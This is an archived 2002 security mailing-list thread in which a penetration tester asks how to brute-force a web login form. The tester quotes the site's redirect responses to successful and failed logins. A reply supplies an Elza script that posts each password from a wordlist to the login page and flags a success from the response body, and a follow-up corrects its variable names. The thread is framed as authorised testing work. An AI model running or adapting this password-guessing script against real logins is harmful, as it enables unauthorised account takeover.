From: Greg (greg@hoobie.net)
Date: Fri Apr 19 2002 - 21:29:10 EDT
Whoops,
Always spot the mistakes after you send it. Dodgy coding.
the line :
subst ACCOUNT = admin
should read as:
subst USERSTRING = admin
also the line :
print Positive Authentication with Login: ACCOUNT, Password: CURRPASS
should read as :
print Positive Authentication with Login: USERSTRING, Password: PASSSTRING
regards
Greg
> -----Original Message-----
> From: Greg [mailto:greg@hoobie.net]
> Sent: 20 April 2002 02:05
> To: joh ket; pen-test@securityfocus.com
> Subject: RE: Password HTML form bruteforce
>
>
> I'm afraid Brutus doesn't handle 302's correctly. Dodgy coding if
> you ask me.
>
> Why don't you try Elza
> (http://online.securityfocus.com/tools/1127) with this script
> which is based on one found in the Elza docs. Obviously change
> the target url and username. This script will read each string
> from words.txt and submit each attempt checking for the
>
> var autoredir = on
> subst ACCOUNT = admin
>
> proc POSITIVEAUTH
> print Positive Authentication with Login: ACCOUNT,
> Password: CURRPASS
> endproc POSITIVEAUTH
>
> proc ATTEMPTAUTH
> field userid = USERSTRING
> field password = PASSSTRING
> # Add any other form fields that need to be sent here
> post url http://TargetAddress/Login.cfm
> call POSITIVEAUTH if body = Some warm glowing message
> about how you're logged in now.
> endproc ATTEMPTAUTH
>
> call ATTEMPTAUTH PASSSTRING % words.txt
>
> In the above script, if you set 'autoredir' to off you will not
> be automatically redirected by the 302 and the '%location%'
> variable will be made available to you for examination. It might
> be easier to just let Elza handle the redirection and then match
> some known test in the body of the successful authentication page
> as shown above.
>
> Read the docs for Elza, you'll need to build a list of scripts up
> before it become really useful.
>
> cheers
>
> Greg
>
>
> > -----Original Message-----
> > From: joh ket [mailto:johket@hotmail.com]
> > Sent: 18 April 2002 10:16
> > To: pen-test@securityfocus.com
> > Subject: Password HTML form bruteforce
> >
> >
> >
> >
> > Hi there,
> >
> > I am currently involved in a pen test on a website
> > which is using formbased authentication.
> >
> > I figured out that a account, named 'test' exists...
> > (...)
> >
> > Now I want to brute force this account, I am using
> > Brutus AET2 for this.
> >
> > But I do not know how to use the HTML response.
> >
> > Below the packet capture of a response of a login
> > which was succesfull:
> >
> > HTTP/1.1.302.Object.Moved..Location:.start.cfm?cid=
> > (lines deleted)
> > <head><title>Document.Moved</title></head><body
> > ><h1>Object.Moved</h1>
> > This.document.may.be.found.<a.HREF="start.cfm?
> > cid=
> > (lines deleted)
> >
> > A capture of an unsuccessfull capture looks like this:
> >
> > HTTP/1.1.302.Object.Moved..Location:.original.cfm?
> > login=Invalid password. Please try again
> > (lines deleted)
> > Document.Moved</title></head>.<body><h1>Object.
> > Moved</h1>This.document.may.be.found.<a.HREF="
> > original.cfm?login=Invalid password. Please try
> > again">here</a>
> >
> > So depending on the password I get redirected to a
> > page...
> >
> > How should the primary and the secondary repsonse
> > be configured?
> >
> > Or does somebody else have a better idea how to do
> > this?
> >
> > Thanks in advance!
> >
> > Joh Ket
> >
> >
> > ------------------------------------------------------------------
> > ----------
> > This list is provided by the SecurityFocus Security Intelligence
> > Alert (SIA)
> > Service. For more information on SecurityFocus' SIA service which
> > automatically alerts you to the latest security vulnerabilities
> > please see:
> > https://alerts.securityfocus.com/
> >
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:20 EDT